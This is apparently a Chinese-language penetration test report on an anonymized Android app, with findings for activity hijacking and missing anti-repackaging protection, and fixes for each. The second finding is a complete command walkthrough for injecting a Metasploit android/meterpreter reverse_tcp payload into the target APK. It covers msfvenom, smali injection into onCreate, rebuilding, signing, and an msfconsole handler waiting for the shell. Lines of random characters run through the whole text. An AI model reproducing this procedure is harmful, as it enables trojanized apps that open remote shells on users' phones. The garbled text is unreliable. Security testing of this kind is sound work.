3 k' Y- X& J7 G$ I
( S; l8 p& w( T5 R5 O. i( Y
+ S$ k' O; J2 ?9 ^) h9 m# _; ~! F
/ M( @6 }% x: c" L" W: c
) T" Y! i- y7 T" H$ i7 C2 ?3 G2 O! C$ [2 K/ s; n
表1-2 测试结果
3 u$ g ^- m" p* i* m$ ~
9 U& a) w4 [8 g, O+ F9 ?) S
/ R2 {: `" |8 R
0 c) F G. N) O
& n q% U6 u9 W- t6 R7 G! m8 L
& H) u) }2 ^# \8 k5 N {& B \% s" B0 c* o' Y1 }. j7 Y1 k1 e
2 Y+ h3 L0 O4 x" _! P
3 ]8 o/ B3 P3 `4 Y5 V
' U7 u2 |5 O7 |$ ~# e6 f: J* [) d( D; a; o/ z+ N
2 检测结果
( w& V( u# |4 ?$ R7 b' H# B- z% B: @* \% A4 H
( f' |: W* N1 R' ]$ {
" H, f6 G& u5 z, L+ l) z8 k' q 3 t( u$ b5 V+ s
7 R3 N- u5 a+ B: T5 a$ _2 K1 K
2.1 某某某 + ]* y1 J: `3 p5 a" h
* a' F- }/ l5 N% X" P2 w) k4 B9 d
3 L. _$ _. f. D* a' o* {
0 J+ R) }; u# x! O: m
4 _, `! I: Z, x: ~3 u% j( N% d
$ _) s4 t0 n# q9 k9 G, K+ n0 [( H 2.1.1检测目标
F( a: O/ [2 @/ N# |% I+ i* S, m: J2 k# t1 ~: t6 t
# k( R3 T6 R0 U% P" C. x3 Q6 ?
+ G( m0 K" s5 m* |) g1 N/ Z
M4 ^3 N" e" |2 D4 Z$ ?
9 Q X( \2 j# S4 b
目标地址: 某某某某某某APP 9 N- z5 H2 b# c; u% L! n& N2 M7 i7 d6 r
# p; K3 y# S" D' q$ V, G
. h# D4 _! f: c0 w% ~! h5 p
% Y$ @% j9 |7 Y+ g. w8 s
* ?& a: G' t$ E; ~/ k8 u6 W5 q5 H. A
2.1.2检测结果 * t8 g) ]' t) V
- o5 M7 p# F r* ?) c/ J! a: F
( _1 f2 I, A, U* b% r4 @: {
1 ~ V7 r- d8 C3 N : X9 ^5 ^) n" b/ Y( u' j
' h6 t' L% I# r& R9 W/ u
2.1.2.1 $ _2 x: y" j, l+ O. q* ~- {! r" R I4 O
R6 c) t, B8 v1 [$ n
% K8 [2 ~" c: B" j% A- r2 y
' M0 R0 q- q# F, ?; e: \& a, n ; y# ^: @; k" e$ t8 C2 t" r
/ \9 b$ }: U( C1 O
漏洞链接地址:某某某某某某APP / Y6 Y" n! O% T/ M# j, H4 t
. x0 j9 x% E% F2 l5 y0 C; f
9 s5 \8 ~, }! k% ]
% ?+ [# w: U2 z1 f ]- \3 [1 F A7 Y2 M0 D9 x: E
# i7 F7 t' e6 h! e
4 H% X5 a \/ Q' Y* S' T" B" W
3 E( O# n! P6 n8 V7 w/ k- o( S( H
9 v% h* V% v+ ~' u. k3 Z; T+ U
9 j1 }# ]% N5 J' `( Y9 i# [
1 o! {" W2 |; A( J# K% j
; D* w; ^! I/ C9 K& Y4 e 漏洞分析及取证:
* Z" X2 _1 f( |0 i3 E5 o) f; y' {4 y8 u! W; _4 W7 n
1 m9 s+ p$ D3 A) b- O5 X2 C9 \, V1 Q; {% R% i) K1 _
9 @$ J+ P0 `7 s, J
4 V E7 ?/ F# G+ _ 通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: ' a" S& T8 ] a, ?7 K
6 x3 J4 e* T0 n1 t$ [
0 K% G, `0 }+ A o! a
2 ]$ C" M; I7 } 3 f; b6 s: {7 {( d) @
! W1 J% D+ z$ Y" [% |. N: s 
/ \6 T9 n7 E V3 Z6 a, O
4 z9 G6 e0 J( {1 q4 N* b
3 B9 w( H4 n# R) ?
- h* E9 d7 g( ]
6 S' s* Y/ B, N5 j
/ P$ B8 y0 H- o
0 D3 R, W" c4 F6 f
( t0 c" A% M6 [6 y
$ |3 G5 W+ c( W4 \
0 _. ?* T4 v( B" C; d9 _ : Q) v- D1 y7 }4 Z
; F+ g3 l+ A5 x9 H7 x
; S, x% ^0 G8 \6 |' B O
/ s. } W) s7 ?* {9 b m
/ h0 C5 z! n* [$ p
! S; c& i! I' M! r8 P 2 g% u! T# ?9 ~
! g6 X+ L5 R/ {# P, h' C( x9 P4 F
0 j+ v9 `& @9 w9 {/ `
; a' F. q, u5 Y5 R5 ~5 E
, g6 a' W# c; m9 }
" @: P1 j2 h& x T0 b - ~& t5 @4 U3 h/ W7 U
$ h! O+ W2 o+ D, V
! L( {* l* r( k) L$ e+ t; I. {! g/ y% o. {' `
* C; o5 r) k0 m- H2 K' a2 x, x: u
3 d, [/ z$ T5 G8 J 9 [5 `( x) d }! u/ q8 U
& H* G$ I0 }& A7 r* {& B* ?$ C* e 漏洞危害:高 * R" E& T0 l1 j$ ~2 H4 k
* @" b8 r, `8 U v8 Y
+ D' C r1 e" G! V1 q$ C! p5 Q3 I' m7 ^, t; F1 M$ j$ u# ^
/ O% ^3 G ?8 \7 S
+ @& I4 M0 t% q$ X/ ]% \
/ d: }7 i: `9 W7 B9 [& d8 m) l
9 w f" T4 {' p- N5 t
+ u' I6 o7 N1 R [7 m) A
6 a5 i+ x' U; g* i1 d2 z, i _
% H5 M2 S+ j& A+ z4 p, z) _ |
7 r) i' G3 m8 t+ o! I3 @- C* w8 N
6 N \% [. o; X0 C' Y* J
1 _3 v: ]4 s5 y$ M3 b# q1 X2 D
1 j4 I3 T6 t8 ] T9 ]& M" r: P 严重程度 3 }) V8 S+ z% C4 Q$ ~
5 f _! |5 X% M: G% u [3 }
9 Q7 H0 Q# S$ P# f$ b; v; u
; H, N7 ], M7 h" r |
* a3 c. H7 j( }2 S J* s) J4 ^% z# V- Y! q5 u. P5 q& z% J
0 V3 E8 j2 p+ ]# z% D6 w" V: e
# J$ }* f8 P" |4 ^ 6 Q3 g9 o4 T: l5 J* Q
0 k& ]1 j% |, F- y; Q
高 . c! [' b! u8 P2 A" V
1 ~' W4 `% b% ~. p4 l/ W / v, h% C+ B- q
4 c! x$ R7 l: t% H( a
|
0 w! s c( l! c# z' U* j$ E
- B, d- W. Z+ A% y2 x/ b: u ! C( V. ~2 J/ @5 }- ~% Q) N/ f9 i2 w
n7 c8 E. T8 }, E1 l C7 [: L
% j, ?8 s Q& I' C j
) \( C4 d5 A3 g2 V4 d0 g$ f2 C1 v ■
" t7 D! `. h! `+ ]
2 i" d, j% L2 q1 z$ ?8 u
4 H4 h. l5 D# S4 s" Y: b+ v1 d1 O) F8 ~; T _- M4 L
| 8 p8 P) R0 T/ Q
\$ a6 r6 C) L: e5 @% { % n5 E8 v/ z: x' b2 Z& y# Q- ~
: s; F. J) W/ E7 j3 N' d w
0 X- z; r7 K; v& H) m
& P7 L4 R4 P; @ 中 8 N9 o6 J& |# V" u
! @! V; y! `# [9 h& y. S0 R3 h6 [
7 X9 z* M$ ?" k9 v2 P2 S# e
7 x3 z/ Q, e7 v }' R, @ |
, L G0 q8 g7 f+ B+ J+ _* J8 W6 X, k) [2 f& l
! W4 f/ e2 I+ x# P' q7 i R$ Y5 L; u$ v: y$ E& ~2 w
3 O# R! p2 e0 b' H. j, P( s, _6 \4 Z! E- R+ w6 q! }1 a5 R; d' j9 A
0 k U& d. m2 h. c; w; _
5 ^5 F* d8 ^* w; I- o8 Q: e
% |$ V( h5 u0 ^3 x$ z4 N9 _/ w S" F- m2 C3 I" y% y
| - ~/ N# k2 r1 a" M
: \- O9 \ G* J5 t. k p0 p" c. @) T
& N; r' o2 g) E
( z q/ B% S x, `8 Q. P # Z7 ~4 H% b6 ?* k- |3 @
5 @" A% r7 B3 c 低
9 C4 H6 a5 v+ e8 O/ F% v& n* X9 s# v. Y
- f3 q. _$ V3 k! U& F9 i
1 I, y$ K$ y {' `4 } | ( l/ {- I; E0 K) Z; v
- h8 ]: y- B' D8 R0 e. P4 u; S
: L4 W+ T0 m! w# ~0 T
g& i2 f5 \" R3 I9 P8 v, Q5 s% l
5 h) @& [4 J! |3 B
) o% X/ W6 p0 k) c& Z) r
6 {; u! {5 {. g2 }9 G4 h: r
& D2 O) j( V' B+ D. L' u
1 A2 W/ M k5 l. @/ ?3 |% O( O% [( j2 [1 u
| $ P7 h9 \6 \8 f; D: D3 @5 ?$ q. G$ Q
. ?, T- U' ^. g$ T6 _4 r! m) u/ y/ P
: f& n5 H) P( a$ A
" K% [7 L' P4 i; U $ Z: V$ O; Y9 Q6 P8 J0 v8 c
& N {& B3 `3 n4 }7 N$ S/ k" ?
2 S' N* k. z4 E; ?+ E, {! ~$ f) E i& d$ Y8 n4 {6 U6 {
- z$ C/ @. @/ @+ ]4 ^6 \7 w
* Q1 X9 n9 h/ V : k- d) e7 r* S% y& v- y
# I1 \, I+ q% _4 p7 p3 h$ V% ^3 S0 g , Q' Q' i. q. }
9 j* S( @; t. \ M) ?7 @7 M4 C
- C7 `+ y) O B8 F2 l8 ~7 G
# k5 i0 s8 [1 }2 d( V x0 Z
! |# a V2 u" e" C' n5 ]
8 ]& |; s! K# S& ]/ R3 S& l 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ! h/ w+ f; G7 K/ z ?
, T8 F: y4 `( Z1 N1 Z
) E' o/ e+ O" c/ d! i1 t0 D( R
& l4 N% I& e9 r- ^6 M. l
" H1 T9 r. d1 w1 [/ O8 z3 d) v) {9 n
* i% t1 k' R; ^$ c3 B
+ A: u$ C# f Z& a4 K: ? l
# A" b; c8 w; p* ~4 u: v! C" n
2 }& v. S9 g) {* M
0 C8 d8 u( T% V8 }
% n; t. T' Z1 F1 d9 l, H
9 k5 e& p. W) b- n- |5 a
4 A# u! C+ U0 i7 h: x
9 Y2 c& ^( {4 V4 X. d8 x, X
: G" O7 o; Z+ e; R$ c
$ I9 f# m9 L" V
0 h! B5 h) O9 I3 i 2.1.2.2
, S( _3 i9 W, L. B+ f1 T
4 _! }( u7 K* ~3 H6 N; y# p
, ^. T5 ~. n2 b% U; \- t* t; _9 t5 F; w% k& g( P3 `
9 j" C( O7 z z! e7 S3 H( K) }/ m& W
! a: X% f9 u8 i( B7 \8 ]) f
漏洞链接地址:某某某某某某APP
* C( R" f8 ]! y' `, c5 Y2 m5 |; U
+ d0 O: N. k3 p- Z
6 o$ `& x9 v: C
; r7 M2 X9 V( m
% x F9 ~9 W& m$ c) q$ Z+ J: o$ j3 ^! @1 B# B7 c, N
漏洞分析及取证:
9 T8 n& U- O+ x
; D' c. |: u/ i4 G- Z7 K
: I0 ~5 Z; P# V3 b
& O: u( x7 n7 Q7 w9 c6 Z& P
8 k4 ~) B/ f9 H: J, L3 T6 Y+ i- t' D6 W3 U9 u/ {/ O5 n
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
" o7 o! ]# H( `: ]. g' \5 L' Y- }" K8 l) e8 K
2 U# |/ l# g0 S8 U; I* \& {: B
0 K. Y/ Z6 o& d5 o* j
@4 R' o+ I9 b1 n8 d3 s2 D+ {, d/ @& r4 _. h
用Metasploit 生成木马 apk 3 W6 s1 [9 J* O9 t4 u S
0 I# B/ A0 o% j. O8 n2 E
; l! Y, t1 J% p z; `" y/ J8 t2 ^
" z- N. R: }/ Z$ K6 h$ ~0 W3 S 0 S# J( F8 {) q3 B6 k* v
3 T5 }& o# D/ m: j
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk
/ W- S+ n) e1 a* k2 J6 _1 E& c/ O3 Z2 p6 R
9 `$ A. d4 x7 P; N. M% T4 z( C, C( k% u: g( K; [2 Q
- I8 d$ ?9 f' ]; v$ B, E) c1 r \: @- I% Y6 g7 a
反编译目标apk和木马apk
4 A" V: ^9 `# g7 A+ X! g, v
0 Y; Q C$ s9 Z! u
* ^6 `5 _% t4 g; B }
! ?( G, t! I. f1 F" g6 ~! f% {) T
4 h0 J2 {# o6 p% E1 u9 ~- Q. v5 j6 n- e1 t" }9 B+ W
apktool d target.apk
2 f r4 `8 B( D
( D# b; T8 ?. {+ {2 w* f$ C apktool d cockhorse.apk l8 |/ ^$ X$ e( d0 k, S
$ n0 k- A- Y2 q
' E( t# D; ~8 R. v/ `% |6 C n; \7 I& l1 l0 g
* ^) J6 p2 l6 ?& `8 H5 e
- g: M% Q+ {/ n; W! B
木马 apk 注入目标 apk ! g9 O& G4 w. h! I) o L
9 A5 o: p& ~/ z% t% d4 C+ m
& S5 a6 f# Y! q
. s# v6 ^6 H0 ^' `" o1 z2 O $ h+ V) Z' Q1 r% V( k0 V! l
2 o3 ] C4 k0 M* O0 y' [7 { 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
# Q' K7 b1 ]5 ^' O+ p. v" W8 C5 Q9 F5 m2 H/ O
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
* d9 R F% p1 n$ Y9 l, e1 M, ]4 n/ b; G4 b, `) _
6 q& ~$ X4 p7 T0 Z! ^ f9 ?+ B
/ D4 `4 G8 B: w+ \
% K2 {9 o4 I4 b6 F8 m; U0 \7 T; q
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
4 s) x' F# o5 |& n9 r( x- J; L
, F! N+ e6 ~- C! {3 h1 q* z
' M1 U& U' g5 a# f" n9 E
: R7 ^" F4 ?( x, d
, c. H1 }% L9 m. r$ R4 p# W6 S8 X5 C, h# q
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
! ^. q5 F/ b/ ?7 y8 d
" o) ]& C$ s; Z7 _+ u
; I( e/ O. o2 |7 p- `7 c
: V% q2 `7 e K3 e $ |- o3 r) c- v Q9 z+ t: M
- X/ ~$ {; k6 [. I$ k% r9 W, \( @ 回编译生成最终 apk i9 z _* A! _5 }! H1 B
, N9 C% Z0 @ a4 {' L1 }$ I
. C1 p# D; c' P
: O2 J2 ~6 l9 K) i$ j6 U }8 C. b' Q5 M$ H' J
* R3 O( y, |% `' ?7 x3 T- I 重新打包
8 P% S ` N* t5 g4 u2 q
0 l3 k+ s: a4 A) o
+ y/ O% O8 X! m. \: \
5 t' F* v( @# q4 Q - D/ a/ o' c& o7 j! O! L& j) m
: P4 t }+ `; F/ R apktool b -o repackage.apk target_app_floder # W& B8 k7 X; U, B
2 u0 Y b7 J1 l8 _+ Y: o# B
7 n2 I$ V% q% z: _6 j0 X m; R
: L+ m5 C( s& ~) Z
! ]! `# B f+ h" i3 d: r' i0 q
# N) H0 Q6 e) z% k+ L$ B7 J$ E 创建签名文件,有的话可忽略此步骤
4 E# l- t# u/ y# X3 A+ F4 p) a9 a9 @3 o
: C V6 q9 i% p, E6 n: ~$ t
& ?; {6 v7 x; o) z$ B
' I: Q0 q3 S8 q4 |' V4 H
, B+ y) D9 V C$ N keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
; H; |3 \& G) x! a' T9 U) N2 S. O, Y7 O* I, s H( l) a
- _- p4 R B9 L6 X" F8 w
$ |" m7 k' w5 _2 a7 Q: d5 J
0 h! p4 l+ a0 H, ^2 X. B9 s" A% c' H* i% F- l6 @5 `8 H. l
签名,以下任选其一 . ~0 a: A6 }, \6 ?9 @) B, [
! f) h! i, `+ B0 Q5 G
. y9 x% r- |; M: r6 v
, ]/ ^7 P1 j2 }) n& V
$ q& K+ ]2 {4 ?" H/ ` u1 a7 L: [
jarsigner 方式
7 @- g% ]) m, p; y" H, `: ~- _+ C1 q8 Y5 r6 V8 S
2 z. u$ |3 h' U/ E6 z
5 m. y0 _7 [; j. K& B: ?3 F# U
0 @: g/ f/ r( x. z+ O- g* F
! {. m1 t4 n8 e8 a+ j& Z6 x jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname
( j, f9 F3 }; f, q/ k2 k' O w' B0 Q/ @6 i
' H+ [2 C% W3 n, a1 b
4 e+ N" n3 E( L 5 v1 f4 x' w4 |9 g' D
/ n4 S( m! R) W5 r$ R
apksigner 方式
/ Y& ? L8 c- ]' S) L, O2 a+ U' \6 `4 N. F" H0 q6 V
/ r5 Z8 }9 M+ D: g7 r: N; i+ i
; S+ @ A" a5 n1 W5 A
# T' I0 c) T/ N" V; ?+ ]8 O
/ H7 \5 J3 r; ]4 b: S3 { apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk & ?. q n- ^5 Y! o d7 F
9 x4 \5 B+ }2 V; K& W$ A
$ y% ^( M Q2 A7 p5 \/ I2 N
' F6 w# e5 {! _( y
7 ?5 H( Y+ @/ ~& l) f; W! F* c5 s. y) O" H6 a
如需要禁用 v2签名 添加选项--v2-signing-enabled false $ h4 U7 Y ^ @! Z- ]7 U
) l0 Y. v( ]3 x1 G6 y S* c d
1 d. a6 I2 x6 L4 {! p
) X& h& `9 b% b; ?( m: Y$ d
4 W. E$ V! M6 T/ U3 a8 M* W: v8 f
8 O% f, Y% @! @; ^" c+ T 验证,以下任选其一
- c0 D! i' V9 M5 G' F
7 r$ N! q7 R2 Y2 s# Y
# u: W+ I3 ^4 o% H' _5 [
8 R9 A3 q! s0 b0 v* _' [3 W 1 ^9 @' i# S$ C2 h' Q) I
3 ^2 x0 K7 K5 s- G% P; G9 c
jarsigner方式 9 q {# K; l6 e8 f9 a4 F
$ W; O+ a! _2 u5 v, X
+ x$ q" Z: B6 [2 e# }7 e/ Y, Q" U
+ G/ N6 I( b: L* z! G3 x& J
; U( j9 w7 B: ?6 z$ B) J0 k" }- n8 u0 z
jarsigner -verify repackaged.apk 7 X3 L5 Q; @' J* C$ F L8 D7 e4 {
. [2 U$ m- @1 t0 {& L0 b
; |. A! `6 Y% H' R4 s
) C1 d% Z( E! R$ O: h: U " l( j* f: J7 ~+ V# y
7 k8 ]$ c- e2 V8 y( o
apksigner 方式
0 F" {. ^* A: Q5 K1 u; D" _
* ^9 V. n- w7 {4 o% N7 ?1 h P
6 {7 v) r q2 {7 P
( {0 h3 U+ Q* o2 {) ^
) @! i5 }# T6 @' A* `+ p) [( U) R# L. P- ? J
apksigner verify -v --print-certs repackaged.apk
$ M$ _+ D! M2 Y0 E
7 ]8 G$ d5 ^1 u5 @6 F
) n0 j. ^1 i. S1 E% O- w0 S
8 t; ]) @! Y, y; U5 E6 c, p
% G2 i" U2 {; V4 Y6 s
+ L% r- [* _2 ^$ x- {4 {* w! [ keytool方式 6 ~6 E0 S* j, F* d* w
" v" C* C+ S. b: a
. g+ C5 V% S7 y( E7 M4 D# Q$ |; c* u
- c/ }' |3 l6 C" B1 u
$ c2 h$ |" W- s0 i. u" ` keytool -printcert -jarfile repackaged.apk # [, u9 H4 n+ Y( G
* X- B3 F e4 H3 F3 y3 c8 e
# I( |5 S, L. P; q- v- p. o3 d4 d+ `6 ] c
; _8 q' `/ D# k) Q" |/ h" T
, ` v( I! X# Y7 o2 S) j
对齐 7 d9 ]5 j, D* w
2 R1 u" C7 F# Y% v- D
/ ?4 j: T7 ^ J9 K9 d' D
2 A! M4 S; c& N
H6 u( Y! [9 t
8 W' t8 u q$ _' f 字节对齐优化 % Q" |1 \3 b1 b& N% W/ ~8 ~ j( x+ u
) r) D: n/ g/ u7 z4 k4 U
0 l& e" B, H; O7 ?% m, `
$ l6 P4 ^, |+ T- ]
1 ]! G; y, s* A/ D* k5 X3 n3 e. a1 [) n# t# B# T3 N
zipalign -v 4 repackaged.apk final.apk - w" |% n. k" U4 Q; ~; `: O4 _
6 N) c8 q9 s2 w7 L7 V
7 `+ a" S) X- y9 y/ x5 A; j' Y9 \ A" `- I/ B \2 f0 Q ]
2 N# V2 n4 p8 e& ^% u. w# v
$ ~. x0 J/ O, I# I
检查是否对齐
; {# a0 G) c$ G8 m- e6 `
9 ^# w9 ^+ s% D. g# D. ~
( d. q) j0 s+ y% H) R, ?7 ]( ]4 m h
! V; P0 h* b3 C$ f! V3 {
+ a, f9 b$ [5 f5 c7 j; g0 s. M5 a1 b5 K& G, W5 Y9 n
zipalign -c -v 4 final.apk ! v* g$ M+ ~ z% i1 `3 R
& `6 R {+ O. c- o( u7 k- k) \
! z, o0 K& h$ E+ I W# e o
4 g% E& |8 b6 z& C
R( t& U9 k% z/ y+ m8 n
( T+ V3 u: w7 ` 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
! }8 F% [0 }+ H. M% U* Q; c7 G" ?7 l* X W
. a& ], m: B. c" F3 \" M4 h* P
% l0 T u, s+ ~6 t+ `; o 8 I) H# k5 Z& _4 F1 Z3 H& d
) B. `6 H% x2 p. f8 `
启动Metasploit控制台,配置参数等待上线
; n' S5 u V) ~* z) i/ d* B5 U
! A! y' R7 z/ q2 b& }& W3 A' ]
1 u) W! B+ C* |* x; v2 w& S/ A( W- T5 D1 u/ d- W
. C, w. j3 o* i5 G: i
# S* {3 O3 e3 R: R$ d0 E
在终端依次输入如下命令 $ r" @* H8 u2 @( [3 Z
5 S, ~& W9 }( O7 `4 `6 H, ~
0 D8 d0 t$ ?0 H8 }% p# L; C
1 J* @5 P4 o7 q4 Y6 z% D
9 Y0 S+ i+ C- y8 \* i) k( T& D* p- H: p7 o
msfconsole / p' b5 z1 o6 z
" Q* g! Q9 R; t; @( U4 {6 q
0 S, r. Q F o1 C G9 Y' u8 p5 C
1 k/ l( j1 ~7 H
: ~7 b1 g8 D6 \: P+ q/ l6 M/ ~; d
! n: s6 g9 H4 Y) y use exploit/multi/handler
3 B0 n( G3 U& p' i7 R0 {1 W4 |- R o L- e+ J8 j2 U" e
4 }3 y: `) ?! W9 R7 L- z- R% o' R! d
/ i/ j5 n. ^% ~5 U
, j9 x) W9 J' f7 C9 Q X+ n' M: X/ q
set PAYLOAD android/meterpreter/reverse_tcp ! ~7 C7 Y; `: x R$ b: C7 f" N
! G3 j! `+ y& T' p: M, M9 ]
9 o. y0 V. d* T/ R' k
$ h( s" O& N8 G/ F + W0 E9 h8 m8 } h6 g
2 W& Z9 T" G4 J v
set LHOST 192.xxx.xx.xx
# N3 l7 e9 m' u% H; Z1 D
$ \2 x3 h1 b2 B& t
) R; U1 b, F2 E* @5 @1 ^6 K6 B
) V: r# k) Y- G/ }6 Y . S) ~4 Q5 `- U1 d! M6 W' H
! `/ x/ G9 p6 j* r% U9 |
set LPORT 4444 2 L9 k' H2 {2 ]4 B9 E: F9 A
& M1 e. I7 |4 F1 Y: v! x
5 X) V' B3 W8 A8 }4 z1 a: d* J7 [8 j$ @& \, m
) U( u0 M3 M# b0 r3 x
3 p( k1 R, W- ]6 N1 M& |; \& e exploit 4 m0 W$ m7 E, s
5 p2 s0 c- \: \# p9 Y& R
3 i9 u$ S9 O2 r- J0 l" I! i- W; _, {" L
; {9 l# a1 [- q4 R x; G7 o! D# h1 g# U3 ^& t
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图: 
$ v2 y. y8 c! }! s7 [$ C" Q4 S9 T+ x. |% H9 s( {! q! w/ N
% H- D6 L8 A: L) }% L- C
T& F1 c0 t* v) `
, G; z# g) r9 @( f5 p* `
$ X2 T6 S9 A. W: E 漏洞危害:中
! G2 f# f2 E, \
. G% }$ s: U+ r
3 g M3 F. |3 B6 A
% n* [) q6 c7 X ' O- N9 q+ v- G# i
/ P3 c! `5 P! E5 A% Q1 \* |
" v! P: X' l( [4 p) q- H) d0 T
; g7 r$ }8 B! S9 G$ C2 Q
/ W2 n# T* g" F
) ]" K* l u4 c* p1 n7 c
% p7 e7 M+ O L! M0 {; N
M3 q2 r9 S5 j4 N4 p " L: I& p# `0 U
0 o& y3 u' ?- _. ]# I2 d |
! ]5 k% x. H( h5 l6 \& X6 B
9 `7 J4 x( I3 o' R
, ^/ n9 H. b( w$ z' z$ s* _- w' e
3 I. o# T& t9 v# ?" g) V# n 严重程度 ' m* G. t7 t9 u' Z0 c: x
. _. g/ x) Q1 n4 ^4 q- }8 f" r
' }2 s! q: M, Z3 C: J) r! _
3 h( a+ Y6 s) m |
+ ~! Y+ d) a3 [# k8 j, ~; \2 I/ _% ^" Q1 e* l, w7 A
: W8 E l# L: h
) l- n0 s; |. U : Z( M/ g1 m# W N/ E: O: R
2 C8 }) D* f% o1 L7 Q 高 0 @: P7 m2 C0 l, k0 y& e9 {8 b
( S$ d. W" s: q0 n- ^ ' `& z8 @1 V; w% G- D7 h/ ]: o! _
9 @. }+ ~' M, l% u8 u
| 8 y9 Q& M: `9 K2 h
% X/ d" n% p; \* g
3 X+ C( Z- v( \+ e- j/ r1 K
' ` N+ U1 b9 W7 D$ |% f! h % y& _ k6 J4 J
2 S6 i6 n8 r+ f, `# ~6 u* }1 R
■
# e# ^' i$ ]0 [8 u8 q3 h
3 Q6 I5 r# W, \' `1 ]' f 1 B9 J% R! \! G7 u& D/ Q Z, t8 d$ u; q
& c1 k' w( `5 @8 R/ S9 X
| # i* K( p4 R- P$ C
1 G/ F* {' K. m3 f* |
8 I' T# S+ U3 x5 B% h# W- ]/ i# y: ]' M: x% n8 N2 V7 A6 |" H2 w
3 `6 J4 X" J4 p4 s. a' l E8 X$ a: h2 N
% y* ~' K6 h" a9 |8 i( x' P
中 / n3 Y5 I i- n1 v& @
/ ~4 j t; \9 T) f, s( q8 l 8 X9 c7 b! q; O1 R/ g
+ \, A p0 s3 ?3 S2 U | 9 @- v5 h9 `9 ?$ z2 P+ T/ o: f
, e, L8 J5 Y; I9 m
* k, i4 ]4 E: @. v. v
! G: @/ k; m3 s4 G% ? * D, o0 Z; N. y
; D3 A' {4 e& x
$ r ^1 r5 |& u5 i9 Z9 \) C0 ]
+ Z$ w4 j) K- J f' |: B }% x4 ? w! i' t) e
& O, y; B5 S" ^
, O! \+ O: t7 g$ v8 D( l7 W0 O. {/ w" s% F
|
; z! d$ i" O7 E4 v$ p) |& z4 y# ~2 l+ a4 J! I3 M
2 v& V. B7 Y; f' X, C: K6 O* d2 V, d* |( `# J5 w% [' \
( B5 G, b4 }0 ^5 K. l7 W5 V6 X* l
4 o" q( u7 a: \: @# \ 低 ! W |( T, t. X" Y2 U
0 R0 Q- X& V& H" i; A' D 0 `) \5 I! T1 j" S
- O/ @ c/ ~7 @. A7 z; f: E
| % |$ \/ ? n& p8 u; \. w
: d8 o" Q/ o" @+ Z2 }2 C/ h8 l
/ I$ [4 @% Q, e' _$ Q( f# O9 {/ ?, @( n
. x. J# ~2 N/ O w- o- ]6 Q6 E. d" j5 E3 D
# A; p/ w( Y: |* K- n6 p3 g' c8 t- [9 r. ^2 B8 K
S! K7 O9 X; U( g- r P3 e4 [- x1 V
! h* m# X2 C$ A }- c
5 Z' x( W& |; y; a- T
|
+ e. l' A" k" Q7 Y1 _" G1 [; E
5 k- z9 f" q7 R0 f9 L4 N6 [
/ W, e8 v/ v3 T, N, v+ c$ z3 i5 J
4 p M9 d7 }( |2 D6 W
$ F6 d& c3 H( U1 }+ j% M
4 a$ w. t: M6 f) x
8 h" H; f8 O( d( i- S
, _- {( B! x4 h% i& l0 @
$ }! w3 F7 H) g9 x$ u4 s- c8 m3 M8 L7 j; @
" O x. E+ `0 k7 S6 p0 V
& d# a2 p k9 Q. w; w5 K6 D
) {# t4 M% J6 [: ?" ^+ Z
* p( T; v3 a8 j* Z
8 p9 ?8 C/ c( D0 `$ H
% J [/ o$ V% }& I& M9 L
, D5 @0 ~: W: I/ P- L% t. {) b8 \) ^4 e' j# ^. e0 ]
修复方法: - c# T6 |7 Q1 U2 c2 S, M
% ?8 K) c; I( h9 v9 r. B, Q' w# C
+ E, J/ f/ }' V& ~: @; X: u2 n1 _! g& |* p. {1 G" b
7 f8 j+ d$ ^4 N7 ~* ^2 ^; G7 c
X, U( t$ e5 c- E, d, c; ^
1.在 APP 启动时应做签名校验防止二次打包。
* I5 p: y$ B$ X' W" c
- T: h7 J7 t& _* | 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 , T2 L0 M3 L% b& X. I1 i
' Z$ r$ o- V% L1 d) r
% U, a7 m2 p9 J+ L' E1 `0 \
1 R7 y1 Z9 }/ f
4 M7 ~& w: n/ I/ P: I+ w
$ V% o# Z2 o$ J/ t
0 |8 d4 f. s2 A% K/ L/ ]0 m) S$ [, a5 _8 b
; y3 C( u3 `4 j0 z6 i
0 i$ s; z# B0 N8 L7 \
! s6 v* l+ E- v! v/ {) h# t' e* b, ]' {
) H z. E- e0 v
; C1 p; ]! G' ^0 \
# t4 [0 h/ Y# O+ }! _9 N$ Z9 l# i: J6 ?) A, B+ N
9 l0 C+ ^% P$ }. K
+ Y$ r n1 a& ?& i
$ {0 d/ g6 ]3 V/ z; b
4 h% `! k# B& B: q